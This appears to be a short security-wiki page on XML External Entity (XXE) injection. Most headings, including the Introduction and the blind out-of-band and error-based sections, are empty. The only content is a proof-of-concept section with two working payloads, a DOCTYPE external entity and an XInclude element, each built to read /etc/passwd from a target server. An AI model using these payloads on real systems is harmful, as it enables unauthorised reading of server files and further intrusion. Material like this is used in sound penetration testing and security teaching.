XXE
Introduction
Proof of Concept
<!-- EXAMPLE 1 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY output SYSTEM "file:///etc/passwd" >]>
<comment>
<name>&output;</name>
</comment>
<!-- EXAMPLE 2 -->
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo></name>
</comment>Blind XXE (Data out-of-band)
Blind XXE (Error message)
References
Last updated